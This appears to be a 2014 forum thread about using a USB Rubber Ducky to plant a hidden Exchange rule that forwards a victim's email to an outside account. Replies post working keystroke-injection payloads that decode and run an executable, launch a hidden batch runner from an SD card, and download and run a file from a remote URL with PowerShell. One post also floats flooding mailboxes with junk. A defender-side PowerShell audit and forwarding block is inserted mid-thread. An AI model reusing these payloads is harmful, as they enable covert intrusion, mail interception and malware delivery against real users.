KSI_Syn Posted May 4, 2014 So I was working on some PowerShell-Fu for a customer to restrict e-mails with specific keywords in the e-mail body or subject line from being delivered to a mobile device. In this effort I developed a script that creates hidden rules in Exchange that are unable to be detected in the Exchange Management Shell by an admin or in Microsoft Outlook by the user. I also wrote a second tool to detect, view and delete these hidden rules. What I would like to do is adapt this for the USB Ducky where, when the duck is inserted, it runs a script that injects a hidden mailbox rule that will auto-forward all e-mails received by the user to a specified account. The difficulty here is that the script requires a DLL that extends the standard MAPI32.dll that comes with Outlook or the MAPI CDO installer. I am looking for suggestions on the best way to approach getting the DLL on the system during the duck script execution. I am considering the Twin Duck firmware (HID + Mass Storage) option to see if I could copy the DLL to a tmp folder prior to running the script, and if I were to do that I would also like to copy the ps1 file, so I would just open PowerShell, copy the 2 files to tmp, launch the ps1 from the tmp dir and then delete the dir and walk off. Any suggestions would be welcome.
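From the defender's side, the post above raises two questions an Exchange admin would want answered: which mailboxes currently forward mail anywhere, and how to stop auto-forwarding to outside addresses regardless of how a rule was created. The following script is an added example for this thread, not KSI_Syn's detection tool and not code from the thread. It assumes an Exchange Management Shell (or a remote PowerShell session to Exchange) with rights to read every mailbox; the $ReportPath value is a constructed placeholder. The Get-InboxRule pass only returns rules exposed through the normal rules interface, so a rule written directly to the mailbox store in the way the post describes will not show up there, which is why the last step applies a control at the remote-domain level instead of relying on enumeration.

```powershell
# Added defender-side example (not from the thread): audit mailbox forwarding
# with the Exchange Management Shell, then block external auto-forwarding at
# the transport level.
#
# Assumptions: Exchange Management Shell (on-prem) or a remote session with
# the Exchange cmdlets loaded, run by an admin who can read all mailboxes.
# $ReportPath is a constructed placeholder.

$ReportPath = 'C:\Temp\forwarding-audit.csv'   # placeholder output path

$findings = foreach ($mbx in Get-Mailbox -ResultSize Unlimited) {

    # 1. Mailbox-level forwarding (set by an admin or through the EAC).
    if ($mbx.ForwardingAddress -or $mbx.ForwardingSmtpAddress) {
        [pscustomobject]@{
            Mailbox = $mbx.PrimarySmtpAddress
            Kind    = 'MailboxForwarding'
            Name    = ''
            Target  = "$($mbx.ForwardingAddress) $($mbx.ForwardingSmtpAddress)".Trim()
            Enabled = $true
        }
    }

    # 2. Inbox rules that forward or redirect. Get-InboxRule only lists rules
    #    visible through the standard rules interface, so rules hidden in the
    #    way this thread describes will NOT appear here; see step 3.
    foreach ($rule in Get-InboxRule -Mailbox $mbx.Identity) {
        $targets = @(
            @($rule.ForwardTo) + @($rule.ForwardAsAttachmentTo) + @($rule.RedirectTo) |
                Where-Object { $_ }
        )
        if ($targets.Count -gt 0) {
            [pscustomobject]@{
                Mailbox = $mbx.PrimarySmtpAddress
                Kind    = 'InboxRule'
                Name    = $rule.Name
                Target  = ($targets -join '; ')
                Enabled = $rule.Enabled
            }
        }
    }
}

# Review on screen and keep a copy for the ticket / incident record.
$findings | Sort-Object Mailbox, Kind | Format-Table -AutoSize
$findings | Export-Csv -Path $ReportPath -NoTypeInformation

# 3. Mitigation that does not depend on seeing the rule: tell Exchange not to
#    auto-forward to any external domain. This is enforced when the forwarded
#    message leaves the organization, so it applies no matter how the
#    forwarding rule was created or whether the audit above could see it.
Set-RemoteDomain -Identity Default -AutoForwardEnabled $false
```

Step 3 is the part that actually addresses the technique in the post: a rule the shell cannot enumerate still produces an auto-forwarded message, and the remote-domain setting stops that message at the boundary. The audit in steps 1 and 2 remains useful for the ordinary case and for confirming that no legitimate business forwarding is broken by the change.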
overwraith Posted May 4, 2014 Well, I remember there used to be a payload that would encode an exe to base64, or something like that, and then on inject would convert it back. I don't know if the process can be applied to DLLs. Exes and DLLs tend to be relatively large in terms of ducks, and would take minutes to inject. Another problem with this method is that some of the firmware has a limit on the size of the payload. Here is some code related to the process:

'File: Base64encode.vbs
Option Explicit

' common consts
Const TypeBinary = 1
Const ForReading = 1, ForWriting = 2, ForAppending = 8

' getting file from args (no checks!)
Dim arguments, inFile, outFile
Set arguments = WScript.Arguments
inFile = arguments(0)
outFile = arguments(1)

Dim inByteArray, base64Encoded, base64Decoded, outByteArray
inByteArray = readBytes(inFile)
base64Encoded = encodeBase64(inByteArray)

Dim myFSO, WriteStuff
Set myFSO = CreateObject("Scripting.FileSystemObject")
Set WriteStuff = myFSO.OpenTextFile(outFile, ForAppending, True)
WriteStuff.WriteLine(base64Encoded)
WriteStuff.Close

private function readBytes(file)
    dim inStream
    ' ADODB stream object used
    set inStream = WScript.CreateObject("ADODB.Stream")
    ' open with no arguments makes the stream an empty container
    inStream.Open
    inStream.type= TypeBinary
    inStream.LoadFromFile(file)
    readBytes = inStream.Read()
end function

private function encodeBase64(bytes)
    dim DM, EL
    Set DM = CreateObject("Microsoft.XMLDOM")
    ' Create temporary node with Base64 data type
    Set EL = DM.createElement("tmp")
    EL.DataType = "bin.base64"
    ' Set bytes, get encoded String
    EL.NodeTypedValue = bytes
    encodeBase64 = EL.Text
end function

REM DECODE THE BASE 64 ENCODED TEXT USING A VB SCRIPT
STRING copy con c:\decoder.vbs
ENTER
STRING Option Explicit:Dim arguments, inFile, outFile:Set arguments = WScript.Arguments:inFile = arguments(0)
STRING :outFile = arguments(1):Dim base64Encoded, base64Decoded, outByteArray:dim objFS:dim objTS:set objFS = 
STRING CreateObject("Scripting.FileSystemObject"):
ENTER
STRING set objTS = objFS.OpenTextFile(inFile, 1):base64Encoded = 
STRING objTS.ReadAll:base64Decoded = decodeBase64(base64Encoded):writeBytes outFile, base64Decoded:private function 
STRING decodeBase64(base64):
ENTER
STRING dim DM, EL:Set DM = CreateObject("Microsoft.XMLDOM"):Set EL = DM.createElement("tmp"):
STRING EL.DataType = "bin.base64":EL.Text = base64:decodeBase64 = EL.NodeTypedValue:end function:private Sub 
STRING writeBytes(file, bytes):Dim binaryStream:
ENTER
STRING Set binaryStream = CreateObject("ADODB.Stream"):binaryStream.Type = 1:
STRING binaryStream.Open:binaryStream.Write bytes:binaryStream.SaveToFile file, 2:End Sub
ENTER
CTRL z
ENTER
STRING cscript decoder.vbs HelloWorldBase64.txt HelloWorld.exe
ENTER
REM RUN THE RESULTING EXECUTABLE
STRING HelloWorld.exe
ENTER

One other option is to simply take a USB drive with you, and run a script with the ducky that detects the drive's insertion and copies the DLL off the drive to a specified location. That RunEXE from SD payload usually works, and in fact works best when used in this way, because the memory on the duck tends to be a little bit slow. You could literally bring a small 2 port hub, and then plug the ducky and the drive in simultaneously in that manner.

REM Author: overwraith
REM Name: RunEXE.txt
REM Purpose: Run an executable file off of the SD card after it mounts.
REM Encoder V2.4
REM Using the run command for a broader OS base.
DEFAULT_DELAY 25
DELAY 3000
GUI R
DELAY 1000
STRING cmd /Q /D /T:7F /F:OFF /V:ON /K
DELAY 500
ENTER
DELAY 750
ALT SPACE
STRING M
DOWNARROW
REPEAT 100
ENTER
REM Change directories because System32 appears to be protected.
STRING CD %TEMP%
ENTER
REM Make batch file that waits for SD card to mount.
REM Delete batch file if already exists
STRING erase /Q DuckyWait.bat
ENTER
STRING copy con DuckyWait.bat
ENTER
REM DuckyWait.bat
STRING :while1
ENTER
STRING for /f %%d in ('wmic volume get driveletter^, label ^| findstr "DUCKY"') do set myd=%%d
ENTER
STRING if Exist %myd% (
ENTER
STRING goto :break
ENTER
STRING )
ENTER
STRING timeout /t 30
ENTER
STRING goto :while1
ENTER
STRING :break
ENTER
REM Continue script.
STRING START %myd%\HelloWorld.exe
ENTER
CONTROL z
ENTER
REM MAKE THE VBS FILE THAT ALLOWS RUNNING INVISIBLY.
REM Delete vbs file if already exists
STRING erase /Q invis.vbs
ENTER
REM FROM: http://stackoverflow.com/questions/289498/running-batch-file-in-background-when-windows-boots-up
STRING copy con invis.vbs
ENTER
STRING CreateObject("Wscript.Shell").Run """" & WScript.Arguments(0) & """", 0, False
ENTER
CONTROL Z
ENTER
REM RUN THE BATCH FILE
STRING wscript.exe invis.vbs DuckyWait.bat
ENTER
STRING EXIT
ENTER

Another option is to download a file from online using a bit of PowerShell. You could archive the DLL with a password, and then it would be undetectable via firewall. The only problem with this route is that you need install privileges to install the archive tool, unless there is something already on site. Here is a bit of duck code that will download and install 7zip:

REM *** Navigate to %TEMP%. ***
STRING cd %TEMP%
ENTER
REM *** Delete 7zip files if they already exist. ***
STRING erase /Q 7za.exe 7z920.zip 7-zip.chm license.txt readme.txt
ENTER
REM *** Install 7zip. ***
STRING powershell (new-object System.Net.WebClient).DownloadFile('http://downloads.sourceforge.net/sevenzip/7za920.zip','%TEMP%\7za920.zip'); $shell = new-object -com shell.application; $zip = $shell.NameSpace('%TEMP%\7za920.zip'); foreach($item in $zip.items()) { $shell.Namespace('%TEMP%').copyhere($item) }Start-Process '%TEMP%\7za.exe' -ArgumentList '/S /D=%PROGRAMFILES%\7-Zip\'
DELAY 500
ENTER
REM *** Delay 7 Seconds. ***
DELAY 7000
REM *** Switch from powershell back to command line. ***
STRING CMD
ENTER

Mubix wrote this:

GUI r
DELAY 100
STRING powershell (new-object System.Net.WebClient).DownloadFile('http://example.com/bob.old','%TEMP%\bob.exe'); Start-Process "%TEMP%\bob.exe"
ENTER

I have noticed that many computers don't allow PowerShell script files to be run by default. You usually have to break the code up into something that can be run from the command prompt. And somebody explain to me how to use those show/hide boxes in posts! I cannot find the button, and these code boxes are making my post too long! Edited May 4, 2014 by overwraith
overwraith Posted May 10, 2014 So I just figured out what base64 is. You see I had learned about it from somebody else, so I didn't fully understand the concept. Base64 and UUEncode are algorithms used in sending emails that convert binary files into a text format.
KSI_Syn Posted May 10, 2014 (Author) I think the idea with the 2 port hub may work best in this case; then I could install the DLL and use duck script to run the PowerShell commands line by line in interactive mode, rather than trying to use a ps1 and have the PS execution policy to deal with. I bet this could also be adapted to eat up mailbox resources as well, by setting the recipient of the message to the user or setting up an auto-reply on the box that is receiving the message to send messages with random garbage attachments.
overwraith Posted May 10, 2014 I think it may also be possible to embed PowerShell commands in batch files if you need to. Don't quote me on that one though.